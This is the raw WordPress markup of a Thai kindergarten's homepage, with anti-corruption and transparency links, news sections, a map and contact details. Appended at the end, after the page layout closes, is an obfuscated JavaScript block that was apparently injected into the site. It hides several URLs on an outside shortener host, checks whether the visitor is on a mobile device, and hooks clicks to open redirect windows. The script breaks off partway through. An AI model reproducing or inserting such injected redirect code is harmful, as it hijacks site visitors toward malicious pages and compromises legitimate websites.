-->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\" data-type=\"link\" data-id=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 